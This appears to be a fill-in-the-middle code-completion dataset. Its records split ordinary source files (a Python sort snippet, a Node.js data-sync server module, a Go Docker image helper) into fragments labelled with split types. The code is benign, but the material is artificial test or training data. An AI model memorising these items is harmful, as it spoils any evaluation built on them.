predict_list = []
for key, value in predict_dict.items():
temp = [key,value]
predict_list.append(temp)
predict_list = sorted(predict_list, key=lambda l:l[1][7], reverse=True) ##sort by count number
#print(predict_list)
|
random_line_split
|
||
sync-server.js
|
before returning the response for the sync request. Default is true. */
syncReqWaitForAck: true,
/** @type {Number} Specify the max number of ack items that will be processed for a single request. Default is -1 (unlimited).*/
syncReqAckLimit: -1,
/** @type {Function} Provide your own cuid generator. It should be a function and the `params` object will be passed to the generator.
* The `params` object will have the following fields:
* `params.query_params`: the query params used on the dataset
* `params.meta_data`: the meta data used on the dataset
* `params.__fh.cuid`: the cuid generated on the client.
*
* This function should not be overridden in most cases. It should *ONLY* be provided if there is a chance that the clients may have duplicated cuids.
*/
cuidProducer: syncUtil.getCuid
};
var syncConfig = _.extend({}, DEFAULT_SYNC_CONF);
var syncStarted = false;
/** Initialise cloud data sync service for specified dataset. */
function init(dataset_id, options, cb) {
debug('[%s] init sync with options %j', dataset_id, options);
datasets.init(dataset_id, options);
//make sure we use the exported version here as the start function should be called only ONCE
module.exports.api.start(function(err) {
if (err) {
return cb(err);
}
syncStorage.updateManyDatasetClients({datasetId: dataset_id}, {stopped: false}, cb);
});
}
function setClients(mongo, redis) {
mongoDbClient = mongo;
redisClient = redis;
defaultDataHandlers.setMongoDB(mongoDbClient);
cacheClient = cacheClientModule(syncConfig, redisClient);
syncStorage = storageModule(mongoDbClient, cacheClient);
syncLock = syncLockModule(mongoDbClient, 'fhsync_locks');
}
function startAllWorkers(workers) {
workers.forEach(function(worker){
worker.work();
});
}
function stopAllWorkers(workers, cb) {
async.each(workers, function(worker, callback) {
worker.stop.call(worker, callback);
}, cb);
}
/**
* Starts all sync queues, workers & the sync scheduler.
* This should only be called after `connect()`.
* If this is not explicitly called before clients send sync requests,
* it will be called when a client sends a sync request.
* It is OK for this to be called multiple times.
*
* @param {function} cb
*/
function start(cb) {
if (arguments.length < 1) throw new Error('start requires 1 argument');
syncStarted = true;
if (mongoDbClient === null || redisClient === null) {
throw new Error('MongoDB Client & Redis Client are not connected. Ensure you have called sync.connect() before calling sync.init()');
}
metricsClient = metricsModule.init(syncConfig, redisClient);
async.series([
function createQueues(callback) {
ackQueue = new MongodbQueue('fhsync_ack_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL});
pendingQueue = new MongodbQueue('fhsync_pending_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL, visibility: syncConfig.pendingWorkerRetryIntervalInSeconds});
syncQueue = new MongodbQueue('fhsync_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL});
async.parallel([
async.apply(ackQueue.create.bind(ackQueue)),
async.apply(pendingQueue.create.bind(pendingQueue)),
async.apply(syncQueue.create.bind(syncQueue))
], callback);
},
function initApis(callback) {
apiSync = syncApiModule(interceptors, ackQueue, pendingQueue, syncStorage, syncConfig);
apiSyncRecords = syncRecordsApiModule(syncStorage, pendingQueue, syncConfig);
return callback();
},
function createWorkers(callback) {
var syncProcessorImpl = syncProcessor(syncStorage, dataHandlers, metricsClient, hashProvider);
var syncWorkerOpts = {
name: 'sync_worker',
interval: syncConfig.syncWorkerInterval,
backoff: syncConfig.syncWorkerBackoff,
collectStatsInterval: syncConfig.collectStatsInterval
};
for (var i = 0; i < syncConfig.syncWorkerConcurrency; i++) {
var syncWorker = new Worker(syncQueue, syncProcessorImpl, metricsClient, syncWorkerOpts);
syncWorkers.push(syncWorker);
}
var ackProcessorImpl = ackProcessor(syncStorage);
var ackWorkerOpts = {
name: 'ack_worker',
interval: syncConfig.ackWorkerInterval,
backoff: syncConfig.ackWorkerBackoff,
collectStatsInterval: syncConfig.collectStatsInterval
};
for (var j = 0; j < syncConfig.ackWorkerConcurrency; j++) {
var ackWorker = new Worker(ackQueue, ackProcessorImpl, metricsClient, ackWorkerOpts);
ackWorkers.push(ackWorker);
}
var pendingProcessorImpl = pendingProcessor(syncStorage, dataHandlers, hashProvider, metricsClient, syncConfig.pendingWorkerRetryLimit);
var pendingWorkerOpts = {
name: 'pending_worker',
interval: syncConfig.pendingWorkerInterval,
backoff: syncConfig.pendingWorkerBackoff,
collectStatsInterval: syncConfig.collectStatsInterval
};
for (var k = 0; k < syncConfig.pendingWorkerConcurrency; k++) {
var pendingWorker = new Worker(pendingQueue, pendingProcessorImpl, metricsClient, pendingWorkerOpts);
pendingWorkers.push(pendingWorker);
}
startAllWorkers(syncWorkers);
startAllWorkers(ackWorkers);
startAllWorkers(pendingWorkers);
return callback();
},
function startSyncScheduler(callback) {
var SyncScheduler = syncSchedulerModule(syncLock, syncStorage, metricsClient).SyncScheduler;
syncScheduler = new SyncScheduler(syncQueue, {timeBetweenChecks: syncConfig.schedulerInterval, timeBeforeCrashAssumed: syncConfig.schedulerLockMaxTime, syncSchedulerLockName: syncConfig.schedulerLockName});
syncScheduler.start();
return callback();
},
function startDatasetClientCleaner(callback) {
var datasetClientCleanerBuilder = datasetClientCleanerModule(syncStorage, syncLock);
datasetClientCleaner = datasetClientCleanerBuilder({retentionPeriod: syncConfig.datasetClientCleanerRetentionPeriod, checkFrequency: syncConfig.datasetClientCleanerCheckFrequency});
datasetClientCleaner.start(true, callback);
}
], function(err) {
if (err) {
// If there is any problem setting up the necessary sync internals,
// throw an error to crash the app.
// This is necessary as it is in an unknown state.
throw err;
}
return cb();
});
}
function sync(datasetId, params, cb) {
apiSync(datasetId, params, cb);
}
function syncRecords(datasetId, params, cb) {
apiSyncRecords(datasetId, params, cb);
}
/** Stop cloud data sync for the specified dataset_id */
function stop(dataset_id, cb) {
if (!syncStarted) {
return cb();
}
debug('[%s] stop sync for dataset', dataset_id);
syncStorage.updateManyDatasetClients({datasetId: dataset_id}, {stopped: true}, cb);
}
function setConfig(conf) {
//make sure to extend the existing syncConfig object so that we don't have to update other modules which might have references to it.
//if we used a new object here we would have to manually update those modules to reflect the change.
syncConfig = _.extend(syncConfig || {}, DEFAULT_SYNC_CONF, conf);
}
/**
* Stop cloud data sync service for ALL datasets and reset.
* This should really only be used by tests.
*/
function stopAll(cb) {
//sync is not started yet, but connect could be called already. In this case, just reset a few things
if (!syncStarted) {
interceptors.restore();
dataHandlers.restore();
hashProvider.restore();
mongoDbClient = null;
redisClient = null;
metricsClient = null;
return cb();
}
debug('stopAll syncs');
datasetClientCleaner.stop();
async.parallel([
async.apply(syncStorage.updateManyDatasetClients, {}, {stopped: true}),
async.apply(stopAllWorkers, syncWorkers),
async.apply(stopAllWorkers, ackWorkers),
async.apply(stopAllWorkers, pendingWorkers),
async.apply(syncScheduler.stop.bind(syncScheduler))
], function(err) {
if (err) {
debugError('Failed to stop sync due to error : %s', err);
return cb(err);
}
setConfig();
interceptors.restore();
dataHandlers.restore();
hashProvider.restore();
mongoDbClient = null;
redisClient = null;
metricsClient = null;
ackQueue = null;
pendingQueue = null;
syncQueue = null;
ackWorkers = [];
pendingWorkers = [];
syncWorkers = [];
syncStarted = false;
syncLock = null;
datasetClientCleaner = null;
// Reset the memoized start fn so it can be called again
module.exports.api.start = async.memoize(start);
return cb();
});
}
function globalInterceptRequest(fn) {
interceptors.setDefaultRequestInterceptor(fn);
}
function globalInterceptResponse(fn) {
interceptors.setDefaultResponseInterceptor(fn);
}
function
|
interceptRequest
|
identifier_name
|
|
sync-server.js
|
Number} specify the minimum gap between each retry of applying a pending change.
* Please note that this is just a minimum value as the worker interval value will also affect when a pending change will actually be retried.
* For example, if the worker is scheduled to run the next job in 20 seconds, then the pending change will be retried in 20 seconds if it's the only one in the queue.
*/
pendingWorkerRetryIntervalInSeconds: 10,
/** @type {Number} how often ack workers should check for the next job, in ms. Default: 1 */
ackWorkerInterval: 1,
/** @type {Number} the concurrency value of the ack workers. Default is 1. Can set to 0 to disable the ackWorker completely */
ackWorkerConcurrency: 1,
/** @type {Object} the backoff strategy for the ack worker to use.
* Default strategy is `exp` (exponential) with a max delay of 60s. The min value will always be the same as `ackWorkerInterval`
* The other valid strategy is `fib` (fibonacci). Setting it to anything else will disable the backoff behavior */
ackWorkerBackoff: {strategy: 'exp', max: 60*1000},
/** @type {Number} how often sync workers should check for the next job, in ms. Default: 100 */
syncWorkerInterval: 1,
/** @type {Number} the concurrency value of the sync workers. Default is 1. Can set to 0 to disable the syncWorker completely. */
syncWorkerConcurrency: 1,
/** @type {Object} the backoff strategy for the sync worker to use.
* Default strategy is `exp` (exponential) with a max delay of 1s. The min value will always be the same as `syncWorkerInterval`
* Other valid strategies are `none` and `fib` (fibonacci).*/
syncWorkerBackoff: {strategy: 'exp', max: 1000},
/** @type {Number} how often the scheduler should check the datasetClients, in ms. Default: 500 */
schedulerInterval: 500,
/** @type {Number} the max time a scheduler can hold the lock for, in ms. Default: 20000 */
schedulerLockMaxTime: 20000,
/** @type {String} the default lock name for the sync scheduler */
schedulerLockName: 'locks:sync:SyncScheduler',
/**@type {Number} the default concurrency value when updating dataset clients in the sync API. Default is 10. In most cases this value should not need to be changed */
datasetClientUpdateConcurrency: 10,
/**@type {Boolean} enable/disable collecting sync stats so they can be queried via an endpoint */
collectStats: true,
/**@type {Number} the number of records to keep in order to compute the stats data. Default is 1000. */
statsRecordsToKeep: 1000,
/**@type {Number} how often the stats should be collected. In milliseconds. */
collectStatsInterval: 5000,
/**@type {String} the host of the influxdb server. If set, the metrics data will be sent to the influxdb server. */
metricsInfluxdbHost: null,
/**@type {Number} the port of the influxdb server. It should be a UDP port. */
metricsInfluxdbPort: null,
/**@type {Number} the concurrency value for the component metrics. Default is 10. This value should be increased if there are many concurrent workers. Otherwise the memory usage of the app could go up.*/
metricsReportConcurrency: 10,
/**@type {Boolean} whether to cache the dataset client records using Redis. This can help improve performance of the syncRecords API.
* Can be turned on if no records are shared between many different dataset clients. Default is false.
*/
useCache: false,
/**@type {Number} the TTL (Time To Live) value for the messages on the queue. In seconds. Default to 24 hours. */
queueMessagesTTL: 24*60*60,
/**@type {String} specify the maximum retention time of an inactive datasetClient. Any inactive datasetClient that is older than this period of time will be removed.*/
datasetClientCleanerRetentionPeriod: '24h',
/** @type {String} specify the frequency the datasetClient cleaner should run. Default every hour.*/
datasetClientCleanerCheckFrequency: '1h',
/** @type {Boolean} Specify if the server should wait for the ack insert to complete before returning the response for the sync request. Default is true. */
syncReqWaitForAck: true,
/** @type {Number} Specify the max number of ack items that will be processed for a single request. Default is -1 (unlimited).*/
syncReqAckLimit: -1,
/** @type {Function} Provide your own cuid generator. It should be a function and the `params` object will be passed to the generator.
* The `params` object will have the following fields:
* `params.query_params`: the query params used on the dataset
* `params.meta_data`: the meta data used on the dataset
* `params.__fh.cuid`: the cuid generated on the client.
*
* This function should not be overridden in most cases. It should *ONLY* be provided if there is a chance that the clients may have duplicated cuids.
*/
cuidProducer: syncUtil.getCuid
};
var syncConfig = _.extend({}, DEFAULT_SYNC_CONF);
var syncStarted = false;
/** Initialise cloud data sync service for specified dataset. */
function init(dataset_id, options, cb) {
debug('[%s] init sync with options %j', dataset_id, options);
datasets.init(dataset_id, options);
//make sure we use the exported version here as the start function should be called only ONCE
module.exports.api.start(function(err) {
if (err)
|
syncStorage.updateManyDatasetClients({datasetId: dataset_id}, {stopped: false}, cb);
});
}
function setClients(mongo, redis) {
mongoDbClient = mongo;
redisClient = redis;
defaultDataHandlers.setMongoDB(mongoDbClient);
cacheClient = cacheClientModule(syncConfig, redisClient);
syncStorage = storageModule(mongoDbClient, cacheClient);
syncLock = syncLockModule(mongoDbClient, 'fhsync_locks');
}
function startAllWorkers(workers) {
workers.forEach(function(worker){
worker.work();
});
}
function stopAllWorkers(workers, cb) {
async.each(workers, function(worker, callback) {
worker.stop.call(worker, callback);
}, cb);
}
/**
* Starts all sync queues, workers & the sync scheduler.
* This should only be called after `connect()`.
* If this is not explicitly called before clients send sync requests,
* it will be called when a client sends a sync request.
* It is OK for this to be called multiple times.
*
* @param {function} cb
*/
function start(cb) {
if (arguments.length < 1) throw new Error('start requires 1 argument');
syncStarted = true;
if (mongoDbClient === null || redisClient === null) {
throw new Error('MongoDB Client & Redis Client are not connected. Ensure you have called sync.connect() before calling sync.init()');
}
metricsClient = metricsModule.init(syncConfig, redisClient);
async.series([
function createQueues(callback) {
ackQueue = new MongodbQueue('fhsync_ack_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL});
pendingQueue = new MongodbQueue('fhsync_pending_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL, visibility: syncConfig.pendingWorkerRetryIntervalInSeconds});
syncQueue = new MongodbQueue('fhsync_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL});
async.parallel([
async.apply(ackQueue.create.bind(ackQueue)),
async.apply(pendingQueue.create.bind(pendingQueue)),
async.apply(syncQueue.create.bind(syncQueue))
], callback);
},
function initApis(callback) {
apiSync = syncApiModule(interceptors, ackQueue, pendingQueue, syncStorage, syncConfig);
apiSyncRecords = syncRecordsApiModule(syncStorage, pendingQueue, syncConfig);
return callback();
},
function createWorkers(callback) {
var syncProcessorImpl = syncProcessor(syncStorage, dataHandlers, metricsClient, hashProvider);
var syncWorkerOpts = {
name: 'sync_worker',
interval: syncConfig.syncWorkerInterval,
backoff: syncConfig.syncWorkerBackoff,
collectStatsInterval: syncConfig.collectStatsInterval
};
for (var i = 0; i < syncConfig.syncWorkerConcurrency; i++) {
var syncWorker = new Worker(syncQueue, syncProcessorImpl, metricsClient, syncWorkerOpts);
syncWorkers.push(syncWorker);
}
var ackProcessorImpl = ackProcessor(syncStorage);
|
{
return cb(err);
}
|
conditional_block
|
sync-server.js
|
* `params.__fh.cuid`: the cuid generated on the client.
*
* This function should not be overridden in most cases. It should *ONLY* be provided if there is a chance that the clients may have duplicated cuids.
*/
cuidProducer: syncUtil.getCuid
};
var syncConfig = _.extend({}, DEFAULT_SYNC_CONF);
var syncStarted = false;
/** Initialise cloud data sync service for specified dataset. */
function init(dataset_id, options, cb) {
debug('[%s] init sync with options %j', dataset_id, options);
datasets.init(dataset_id, options);
//make sure we use the exported version here as the start function should be called only ONCE
module.exports.api.start(function(err) {
if (err) {
return cb(err);
}
syncStorage.updateManyDatasetClients({datasetId: dataset_id}, {stopped: false}, cb);
});
}
function setClients(mongo, redis) {
mongoDbClient = mongo;
redisClient = redis;
defaultDataHandlers.setMongoDB(mongoDbClient);
cacheClient = cacheClientModule(syncConfig, redisClient);
syncStorage = storageModule(mongoDbClient, cacheClient);
syncLock = syncLockModule(mongoDbClient, 'fhsync_locks');
}
function startAllWorkers(workers) {
workers.forEach(function(worker){
worker.work();
});
}
function stopAllWorkers(workers, cb) {
async.each(workers, function(worker, callback) {
worker.stop.call(worker, callback);
}, cb);
}
/**
* Starts all sync queues, workers & the sync scheduler.
* This should only be called after `connect()`.
* If this is not explicitly called before clients send sync requests,
* it will be called when a client sends a sync request.
* It is OK for this to be called multiple times.
*
* @param {function} cb
*/
function start(cb) {
if (arguments.length < 1) throw new Error('start requires 1 argument');
syncStarted = true;
if (mongoDbClient === null || redisClient === null) {
throw new Error('MongoDB Client & Redis Client are not connected. Ensure you have called sync.connect() before calling sync.init()');
}
metricsClient = metricsModule.init(syncConfig, redisClient);
async.series([
function createQueues(callback) {
ackQueue = new MongodbQueue('fhsync_ack_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL});
pendingQueue = new MongodbQueue('fhsync_pending_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL, visibility: syncConfig.pendingWorkerRetryIntervalInSeconds});
syncQueue = new MongodbQueue('fhsync_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL});
async.parallel([
async.apply(ackQueue.create.bind(ackQueue)),
async.apply(pendingQueue.create.bind(pendingQueue)),
async.apply(syncQueue.create.bind(syncQueue))
], callback);
},
function initApis(callback) {
apiSync = syncApiModule(interceptors, ackQueue, pendingQueue, syncStorage, syncConfig);
apiSyncRecords = syncRecordsApiModule(syncStorage, pendingQueue, syncConfig);
return callback();
},
function createWorkers(callback) {
var syncProcessorImpl = syncProcessor(syncStorage, dataHandlers, metricsClient, hashProvider);
var syncWorkerOpts = {
name: 'sync_worker',
interval: syncConfig.syncWorkerInterval,
backoff: syncConfig.syncWorkerBackoff,
collectStatsInterval: syncConfig.collectStatsInterval
};
for (var i = 0; i < syncConfig.syncWorkerConcurrency; i++) {
var syncWorker = new Worker(syncQueue, syncProcessorImpl, metricsClient, syncWorkerOpts);
syncWorkers.push(syncWorker);
}
var ackProcessorImpl = ackProcessor(syncStorage);
var ackWorkerOpts = {
name: 'ack_worker',
interval: syncConfig.ackWorkerInterval,
backoff: syncConfig.ackWorkerBackoff,
collectStatsInterval: syncConfig.collectStatsInterval
};
for (var j = 0; j < syncConfig.ackWorkerConcurrency; j++) {
var ackWorker = new Worker(ackQueue, ackProcessorImpl, metricsClient, ackWorkerOpts);
ackWorkers.push(ackWorker);
}
var pendingProcessorImpl = pendingProcessor(syncStorage, dataHandlers, hashProvider, metricsClient, syncConfig.pendingWorkerRetryLimit);
var pendingWorkerOpts = {
name: 'pending_worker',
interval: syncConfig.pendingWorkerInterval,
backoff: syncConfig.pendingWorkerBackoff,
collectStatsInterval: syncConfig.collectStatsInterval
};
for (var k = 0; k < syncConfig.pendingWorkerConcurrency; k++) {
var pendingWorker = new Worker(pendingQueue, pendingProcessorImpl, metricsClient, pendingWorkerOpts);
pendingWorkers.push(pendingWorker);
}
startAllWorkers(syncWorkers);
startAllWorkers(ackWorkers);
startAllWorkers(pendingWorkers);
return callback();
},
function startSyncScheduler(callback) {
var SyncScheduler = syncSchedulerModule(syncLock, syncStorage, metricsClient).SyncScheduler;
syncScheduler = new SyncScheduler(syncQueue, {timeBetweenChecks: syncConfig.schedulerInterval, timeBeforeCrashAssumed: syncConfig.schedulerLockMaxTime, syncSchedulerLockName: syncConfig.schedulerLockName});
syncScheduler.start();
return callback();
},
function startDatasetClientCleaner(callback) {
var datasetClientCleanerBuilder = datasetClientCleanerModule(syncStorage, syncLock);
datasetClientCleaner = datasetClientCleanerBuilder({retentionPeriod: syncConfig.datasetClientCleanerRetentionPeriod, checkFrequency: syncConfig.datasetClientCleanerCheckFrequency});
datasetClientCleaner.start(true, callback);
}
], function(err) {
if (err) {
// If there is any problem setting up the necessary sync internals,
// throw an error to crash the app.
// This is necessary as it is in an unknown state.
throw err;
}
return cb();
});
}
function sync(datasetId, params, cb) {
apiSync(datasetId, params, cb);
}
function syncRecords(datasetId, params, cb) {
apiSyncRecords(datasetId, params, cb);
}
/** Stop cloud data sync for the specified dataset_id */
function stop(dataset_id, cb) {
if (!syncStarted) {
return cb();
}
debug('[%s] stop sync for dataset', dataset_id);
syncStorage.updateManyDatasetClients({datasetId: dataset_id}, {stopped: true}, cb);
}
function setConfig(conf) {
//make sure to extend the existing syncConfig object so that we don't have to update other modules which might have references to it.
//if we used a new object here we would have to manually update those modules to reflect the change.
syncConfig = _.extend(syncConfig || {}, DEFAULT_SYNC_CONF, conf);
}
/**
* Stop cloud data sync service for ALL datasets and reset.
* This should really only be used by tests.
*/
function stopAll(cb) {
//sync is not started yet, but connect could be called already. In this case, just reset a few things
if (!syncStarted) {
interceptors.restore();
dataHandlers.restore();
hashProvider.restore();
mongoDbClient = null;
redisClient = null;
metricsClient = null;
return cb();
}
debug('stopAll syncs');
datasetClientCleaner.stop();
async.parallel([
async.apply(syncStorage.updateManyDatasetClients, {}, {stopped: true}),
async.apply(stopAllWorkers, syncWorkers),
async.apply(stopAllWorkers, ackWorkers),
async.apply(stopAllWorkers, pendingWorkers),
async.apply(syncScheduler.stop.bind(syncScheduler))
], function(err) {
if (err) {
debugError('Failed to stop sync due to error : %s', err);
return cb(err);
}
setConfig();
interceptors.restore();
dataHandlers.restore();
hashProvider.restore();
mongoDbClient = null;
redisClient = null;
metricsClient = null;
ackQueue = null;
pendingQueue = null;
syncQueue = null;
ackWorkers = [];
pendingWorkers = [];
syncWorkers = [];
syncStarted = false;
syncLock = null;
datasetClientCleaner = null;
// Reset the memoized start fn so it can be called again
module.exports.api.start = async.memoize(start);
return cb();
});
}
function globalInterceptRequest(fn) {
interceptors.setDefaultRequestInterceptor(fn);
}
function globalInterceptResponse(fn) {
interceptors.setDefaultResponseInterceptor(fn);
}
function interceptRequest(datasetId, fn) {
interceptors.setRequestInterceptor(datasetId, fn);
}
function interceptResponse(datasetId, fn) {
interceptors.setResponseInterceptor(datasetId, fn);
}
function listCollisions(datasetId, params, cb) {
debug('[%s] listCollisions', datasetId);
dataHandlers.listCollisions(datasetId, params.meta_data, cb);
}
/**
* Defines a handler function for deleting a collision from the collisions list.
* Should be called after the dataset is initialised.
*/
function removeCollision(datasetId, params, cb)
|
{
debug('[%s] removeCollision', datasetId);
dataHandlers.removeCollision(datasetId, params.hash, params.meta_data, cb);
}
|
identifier_body
|
|
sync-server.js
|
Number} specify the minimum gap between each retry of applying a pending change.
* Please note that this is just a minimum value as the worker interval value will also affect when a pending change will actually be retried.
* For example, if the worker is scheduled to run the next job in 20 seconds, then the pending change will be retried in 20 seconds if it's the only one in the queue.
*/
pendingWorkerRetryIntervalInSeconds: 10,
/** @type {Number} how often ack workers should check for the next job, in ms. Default: 1 */
ackWorkerInterval: 1,
/** @type {Number} the concurrency value of the ack workers. Default is 1. Can set to 0 to disable the ackWorker completely */
ackWorkerConcurrency: 1,
/** @type {Object} the backoff strategy for the ack worker to use.
* Default strategy is `exp` (exponential) with a max delay of 60s. The min value will always be the same as `ackWorkerInterval`
* The other valid strategy is `fib` (fibonacci). Setting it to anything else will disable the backoff behavior */
ackWorkerBackoff: {strategy: 'exp', max: 60*1000},
/** @type {Number} how often sync workers should check for the next job, in ms. Default: 100 */
syncWorkerInterval: 1,
/** @type {Number} the concurrency value of the sync workers. Default is 1. Can set to 0 to disable the syncWorker completely. */
syncWorkerConcurrency: 1,
/** @type {Object} the backoff strategy for the sync worker to use.
* Default strategy is `exp` (exponential) with a max delay of 1s. The min value will always be the same as `syncWorkerInterval`
* Other valid strategies are `none` and `fib` (fibonacci).*/
syncWorkerBackoff: {strategy: 'exp', max: 1000},
/** @type {Number} how often the scheduler should check the datasetClients, in ms. Default: 500 */
schedulerInterval: 500,
/** @type {Number} the max time a scheduler can hold the lock for, in ms. Default: 20000 */
schedulerLockMaxTime: 20000,
/** @type {String} the default lock name for the sync scheduler */
schedulerLockName: 'locks:sync:SyncScheduler',
/**@type {Number} the default concurrency value when updating dataset clients in the sync API. Default is 10. In most cases this value should not need to be changed */
datasetClientUpdateConcurrency: 10,
/**@type {Boolean} enable/disable collecting sync stats so they can be queried via an endpoint */
collectStats: true,
/**@type {Number} the number of records to keep in order to compute the stats data. Default is 1000. */
statsRecordsToKeep: 1000,
/**@type {Number} how often the stats should be collected. In milliseconds. */
collectStatsInterval: 5000,
/**@type {String} the host of the influxdb server. If set, the metrics data will be sent to the influxdb server. */
metricsInfluxdbHost: null,
|
/**@type {Number} the concurrency value for the component metrics. Default is 10. This value should be increased if there are many concurrent workers. Otherwise the memory usage of the app could go up.*/
metricsReportConcurrency: 10,
/**@type {Boolean} whether to cache the dataset client records using Redis. This can help improve performance of the syncRecords API.
* Can be turned on if no records are shared between many different dataset clients. Default is false.
*/
useCache: false,
/**@type {Number} the TTL (Time To Live) value for the messages on the queue. In seconds. Default to 24 hours. */
queueMessagesTTL: 24*60*60,
/**@type {String} specify the maximum retention time of an inactive datasetClient. Any inactive datasetClient that is older than this period of time will be removed.*/
datasetClientCleanerRetentionPeriod: '24h',
/** @type {String} specify the frequency the datasetClient cleaner should run. Default every hour.*/
datasetClientCleanerCheckFrequency: '1h',
/** @type {Boolean} Specify if the server should wait for the ack insert to complete before returning the response for the sync request. Default is true. */
syncReqWaitForAck: true,
/** @type {Number} Specify the max number of ack items that will be processed for a single request. Default is -1 (unlimited).*/
syncReqAckLimit: -1,
/** @type {Function} Provide your own cuid generator. It should be a function and the `params` object will be passed to the generator.
* The `params` object will have the following fields:
* `params.query_params`: the query params used on the dataset
* `params.meta_data`: the meta data used on the dataset
* `params.__fh.cuid`: the cuid generated on the client.
*
* This function should not be overridden in most cases. It should *ONLY* be provided if there is a chance that the clients may have duplicated cuids.
*/
cuidProducer: syncUtil.getCuid
};
var syncConfig = _.extend({}, DEFAULT_SYNC_CONF);
var syncStarted = false;
/** Initialise cloud data sync service for specified dataset. */
function init(dataset_id, options, cb) {
debug('[%s] init sync with options %j', dataset_id, options);
datasets.init(dataset_id, options);
//make sure we use the exported version here as the start function should be called only ONCE
module.exports.api.start(function(err) {
if (err) {
return cb(err);
}
syncStorage.updateManyDatasetClients({datasetId: dataset_id}, {stopped: false}, cb);
});
}
function setClients(mongo, redis) {
mongoDbClient = mongo;
redisClient = redis;
defaultDataHandlers.setMongoDB(mongoDbClient);
cacheClient = cacheClientModule(syncConfig, redisClient);
syncStorage = storageModule(mongoDbClient, cacheClient);
syncLock = syncLockModule(mongoDbClient, 'fhsync_locks');
}
function startAllWorkers(workers) {
workers.forEach(function(worker){
worker.work();
});
}
function stopAllWorkers(workers, cb) {
async.each(workers, function(worker, callback) {
worker.stop.call(worker, callback);
}, cb);
}
/**
* Starts all sync queues, workers & the sync scheduler.
* This should only be called after `connect()`.
* If this is not explicitly called before clients send sync requests,
* it will be called when a client sends a sync request.
* It is OK for this to be called multiple times.
*
* @param {function} cb
*/
function start(cb) {
if (arguments.length < 1) throw new Error('start requires 1 argument');
syncStarted = true;
if (mongoDbClient === null || redisClient === null) {
throw new Error('MongoDB Client & Redis Client are not connected. Ensure you have called sync.connect() before calling sync.init()');
}
metricsClient = metricsModule.init(syncConfig, redisClient);
async.series([
function createQueues(callback) {
ackQueue = new MongodbQueue('fhsync_ack_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL});
pendingQueue = new MongodbQueue('fhsync_pending_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL, visibility: syncConfig.pendingWorkerRetryIntervalInSeconds});
syncQueue = new MongodbQueue('fhsync_queue', metricsClient, syncLock, {mongodb: mongoDbClient, queueMessagesTTL: syncConfig.queueMessagesTTL});
async.parallel([
async.apply(ackQueue.create.bind(ackQueue)),
async.apply(pendingQueue.create.bind(pendingQueue)),
async.apply(syncQueue.create.bind(syncQueue))
], callback);
},
function initApis(callback) {
apiSync = syncApiModule(interceptors, ackQueue, pendingQueue, syncStorage, syncConfig);
apiSyncRecords = syncRecordsApiModule(syncStorage, pendingQueue, syncConfig);
return callback();
},
function createWorkers(callback) {
var syncProcessorImpl = syncProcessor(syncStorage, dataHandlers, metricsClient, hashProvider);
var syncWorkerOpts = {
name: 'sync_worker',
interval: syncConfig.syncWorkerInterval,
backoff: syncConfig.syncWorkerBackoff,
collectStatsInterval: syncConfig.collectStatsInterval
};
for (var i = 0; i < syncConfig.syncWorkerConcurrency; i++) {
var syncWorker = new Worker(syncQueue, syncProcessorImpl, metricsClient, syncWorkerOpts);
syncWorkers.push(syncWorker);
}
var ackProcessorImpl = ackProcessor(syncStorage);
var ack
|
/**@type {Number} the port of the influxdb server. It should be a UDP port. */
metricsInfluxdbPort: null,
|
random_line_split
|
docker.go
|
error {
if d.cli != nil {
return nil
}
cli, err := getDockerClient()
if err != nil {
return fmt.Errorf("Unable to init docker client: %v", err)
}
d.cli = cli
return nil
}
func (d *docker) checkBackingImage() error {
glog.Infof("Checking backing docker image %s", d.cfg.DockerImage)
args := filters.NewArgs()
images, err := d.cli.ImageList(context.Background(),
types.ImageListOptions{
MatchName: d.cfg.DockerImage,
All: false,
Filters: args,
})
if err != nil {
glog.Infof("Called to ImageList for %s failed: %v", d.cfg.DockerImage, err)
return err
}
if len(images) == 0 {
glog.Infof("Docker Image not found %s", d.cfg.DockerImage)
return errImageNotFound
}
glog.Infof("Docker Image %s is present on node", d.cfg.DockerImage)
return nil
}
func (d *docker) ensureBackingImage() error {
glog.Infof("Downloading backing docker image %s", d.cfg.DockerImage)
err := d.initDockerClient()
if err != nil {
return err
}
err = d.checkBackingImage()
if err == nil {
return nil
} else if err != errImageNotFound {
glog.Errorf("Backing image check failed")
return err
}
glog.Infof("Backing image not found. Trying to download")
prog, err := d.cli.ImagePull(context.Background(), types.ImagePullOptions{ImageID: d.cfg.DockerImage}, nil)
if err != nil {
glog.Errorf("Unable to download image %s: %v\n", d.cfg.DockerImage, err)
return err
}
defer func() { _ = prog.Close() }()
dec := json.NewDecoder(prog)
var msg jsonmessage.JSONMessage
err = dec.Decode(&msg)
for err == nil {
if msg.Error != nil {
err = msg.Error
break
}
err = dec.Decode(&msg)
}
if err != nil && err != io.EOF {
glog.Errorf("Unable to download image : %v\n", err)
return err
}
return nil
}
func (d *docker) createConfigs(bridge string, userData, metaData []byte, volumes []string) (config *container.Config,
hostConfig *container.HostConfig, networkConfig *network.NetworkingConfig) {
var hostname string
var cmd []string
md := &struct {
Hostname string `json:"hostname"`
}{}
err := json.Unmarshal(metaData, md)
if err != nil {
glog.Info("Start command does not contain hostname. Setting to instance UUID")
hostname = d.cfg.Instance
} else {
glog.Infof("Found hostname %s", md.Hostname)
hostname = md.Hostname
}
ud := &struct {
Cmds [][]string `yaml:"runcmd"`
}{}
err = yaml.Unmarshal(userData, ud)
if err != nil {
glog.Info("Start command does not contain a run command")
} else {
if len(ud.Cmds) >= 1 {
cmd = ud.Cmds[0]
if len(ud.Cmds) > 1 {
